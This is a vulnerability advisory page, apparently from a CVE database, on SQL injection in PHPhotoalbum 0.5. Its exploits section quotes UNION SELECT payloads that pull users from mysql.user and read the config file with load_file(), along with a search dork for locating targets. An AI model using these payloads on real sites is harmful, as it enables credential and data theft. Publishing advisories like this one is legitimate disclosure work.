7.5
CVSSv2

CVE-2008-2501

Published: 29/05/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple SQL injection vulnerabilities in PHPhotoalbum 0.5 allow remote malicious users to execute arbitrary SQL commands via the (1) album parameter to thumbnails.php and the (2) pid parameter to displayimage.php.

Vulnerable Product Search on Vulmon Subscribe to Product

henning stoverud phphotoalbum 0.5

Exploits

# Title: PHPhotoalbum Remote sql injection Vulnerability # Tested on: windows server/PHPhotoalbum/thumbnailsphp?album=-1+union+select+user+from+mysqluser-- server/PHPhotoalbum/thumbnailsphp?album=-1+union+select+load_file(/directory hex/configincphp)+from+mysqluser-- ...
############################################################################### # # Name : PHPhotoalbum v05 Multiple Remote SQL Injection Vulnerabilities # Author : cOndemned # Dork : intext:PHPhotoalbum v05 # Greetz : ZaBeaTy, str0ke, TBH, Hawk, doctor, Sandtalker, Avantura ;** # ###################################################### ...